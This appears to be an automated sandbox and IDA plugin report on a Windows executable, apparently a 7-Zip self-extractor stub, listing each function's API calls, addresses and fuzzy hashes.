Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55

Function 00401252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 00401296

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59

Function 0040C95F Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899

CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99

Function 0040CAA0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54

Function 00406E05 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 00406E18

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: _beginthreadex
String ID:
API String ID: 3014514943-0
Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0

Function 0040C9E5 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54

Function 004127AA Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004127AF

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669

Function 0040CA73 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02

Function 0040CE83 Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA

Function 004032D9 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D

Function 0040C88E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98

Function 00402739 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509

Function 00401CFA Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09

Non-executed Functions

Function 0040385E Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00403882
SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,00419828,00000000,0041981C), ref: 00403925
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
_wtol.MSVCRT ref: 00403A1C
CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93

Strings

.lnk, xrefs: 00403A9C

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
String ID: .lnk
API String ID: 408529070-24824748
Opcode ID: 9d40265efa088536896acfae4ca69e27bed61809b258dc233c1d8c18e094151d
Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
Opcode Fuzzy Hash: 9d40265efa088536896acfae4ca69e27bed61809b258dc233c1d8c18e094151d
Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18

Function 00402187 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150stringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
wsprintfW.USER32 ref: 004021E7
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
GetLastError.KERNEL32 ref: 00402201
??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
GetLastError.KERNEL32 ref: 00402236
lstrcmpiW.KERNEL32(025649B0,00404926), ref: 0040224B
??3@YAXPAX@Z.MSVCRT(025649B0), ref: 0040225B
??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
SetLastError.KERNEL32(?), ref: 00402282
lstrlenA.KERNEL32(00416208), ref: 004022B6
??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
_wtol.MSVCRT ref: 00402314
MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,025649B0,00000002), ref: 00402334

Strings

7zSfxString%d, xrefs: 004021E1

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: 7zSfxString%d
API String ID: 2117570002-3906403175
Opcode ID: 1b199f56c2d2ce4f93a07a59f4a80a87b2c3be1da1ba760d7f1a60cb3315d551
Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
Opcode Fuzzy Hash: 1b199f56c2d2ce4f93a07a59f4a80a87b2c3be1da1ba760d7f1a60cb3315d551
Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28

Function 00401DC9 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
LockResource.KERNEL32(00000000), ref: 00401E2B
LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
GetProcAddress.KERNEL32(00000000), ref: 00401E60
wsprintfW.USER32 ref: 00401E7F
LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
GetProcAddress.KERNEL32(00000000), ref: 00401E97

Strings

SetProcessPreferredUILanguages, xrefs: 00401E42
%04X%c%04X%c, xrefs: 00401E79
SetThreadPreferredUILanguages, xrefs: 00401E8E
kernel32, xrefs: 00401E47, 00401E4C, 00401E93

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
API String ID: 2639302590-365843014
Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8

Function 00408DBF Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON

Download Yara Rule

APIs

wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
GetLastError.KERNEL32 ref: 00408DF4
FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
lstrlenW.KERNEL32(?), ref: 00408E44
lstrlenW.KERNEL32(?), ref: 00408E4B
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
LocalFree.KERNEL32(?), ref: 00408E9A

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: 59554f6d9bca7902a0271ca2f41497f45a9e4576255c66063583f637390c7374
Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
Opcode Fuzzy Hash: 59554f6d9bca7902a0271ca2f41497f45a9e4576255c66063583f637390c7374
Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4

Function 00402EE6 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 1862581289-0
Opcode ID: 2ac07a319478a49a5ac37af05ddfbc625e213cb6d38eec3af251fca2d70d8ada
Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
Opcode Fuzzy Hash: 2ac07a319478a49a5ac37af05ddfbc625e213cb6d38eec3af251fca2d70d8ada
Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68

Function 00408630 Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0040864F
SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
